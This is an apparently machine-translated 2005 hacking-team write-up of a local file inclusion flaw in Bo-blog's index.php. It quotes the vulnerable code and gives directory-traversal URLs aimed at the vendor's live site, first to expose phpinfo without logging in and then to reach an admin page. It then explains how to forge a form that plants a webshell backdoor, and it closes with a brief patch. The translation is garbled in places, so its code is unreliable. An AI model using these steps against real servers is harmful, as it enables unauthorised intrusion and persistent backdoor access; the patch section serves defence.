Bo-blog index. php include arbitrary PHP File Vulnerability

Author: I am not myself [F. s.t]
Source: evil baboons Information Security Team (www.eviloctal.com)

Note: In this article, the Firefox Technology Alliance (www.wrsky.com) was first launched and submitted to the evil gossip Information Security Team by Firefox members.

This is my penetration vulnerability. Patches have been released officially.
Vulnerability Discovery Date: 2005.6.13
Vulnerability version: Bo-blog version <= 1.7.0108 (before patching)
Vulnerability analysis and utilization:
A fatal Bo-blog vulnerability was just found. I see version 1.7.0095. However, this vulnerability is estimated to be the latest. The job variable in index. php is not filtered. As a result, you can include any PHP file.
Index. php
-------------------- Cute split line -----------------------------
[Codz begin]
33 If (empty ($ job) $ job = "listall ";
34 if ($ job = "Main") $ job = "listall ";

178 If (! File_exists ("include/$ job. php") $ job = "listall ";
179 include ("include/$ job. php"); // if no filter is added, check whether the $ job. php file exists and include it.
[Codz end]
-------------------- Cute split line -----------------------------
We can use this $ job variable to include any file with a PHP extension, as long as it exists on the server (we can use .. /to bypass the directory ). in fact, this problem exists in the admin_cp.php file. only the permission is required to call the admin_cp.php file. so we can only use index. PHP is used.

Now we start testing, www.bo-blog.com this is his main site. Let's take a look at his PHP settings. Input: http://www.bo-blog.com/index.php? Job = ../admin/Change & Action = phpinfo
This action is passed to admin/change. PHP: This file displays phpinfo. don't worry about not calling. index. PHP includes global. PHP defines inwork. so you can use change. PHP without logging in
Some basic information is obtained: the Windows nt ns 5.2 build 3790 server is PhP5, and safe_mode = on.
Then use his webshell. In http://www.bo-blog.com/index.php? Job = ../admin/ban here, it was originally set to prohibit the IP address/language and so on for admin in the background. But it is also not filtered, so we can directly write a shell. However, we have to construct a form by ourselves, first look at his original file, and use the bansearch he hasn't used (Forbidden to search for words ).
-------------------- Cute split line -----------------------------
[Codz begin]
<Table cellpadding = 0 cellspacing = 0 align = center width = '000000' bgcolor = '# 000000'>
<Tr> <TD>
<Table cellpadding = 5 cellspacing = 1 width = '000000'> <form action = admin_cp.php? Job = ban method = post>
<Tr bgcolor = '# e9f2fc'> <TD colspan = 2> <font color = "#000000"> banned words. Each word is half-width (comma) separated </font> </TD> </tr>
<Tr bgcolor = '# ffff'> <TD width = 20%> sensitive words: </TD> <textarea name = "sensitive" rows = 15 Cols = 80> </textarea> </TD> </tr> <input type = hidden name = action value = savesensitive>
<Tr bgcolor = '# ffff'> <TD colspan = 2> enter forbidden words, Case Insensitive </TD> </tr>
<Tr bgcolor = '# ffff'> <TD colspan = 2 align = center> <input type = submit value = submit> <input type = 'reset' value = restore>
</TD> </tr> </form>
</Table>
[Codz end]
-------------------- Cute split line -----------------------------
We will save it as an HTML file. Note: Do you need to set action = admin_cp.php in the form column? Job = ban to action = http://www.bo-blog.com/blog/index.php? Job = ../admin/ban. Save and open this HTML.
In the htmlarea of the form, we write a micro-Backdoor of the Lanker. Click Save. (Note that there are no special characters such as '"/. php automatically adds .)
System prompt:
-------------------- Cute split line -----------------------------
Updated
The forbidden search term is saved.
-------------------- Cute split line -----------------------------
Success, huh, huh.
Come on. Let's try connecting with the client of the Lanker backdoor. Do you see our cute shell? What is it about? It means it is successful ~~

Simple vulnerability repair:

178 If (! File_exists ("include/$ job. php") $ job = "listall"; Add the following code before this line:
$ Job = str_replace (".", "", $ job );
$ Job = str_replace ("/", "", $ job );

Test the animation of the official Bo-Blog website:
Http://www.wofeiwo.info/boblog.rar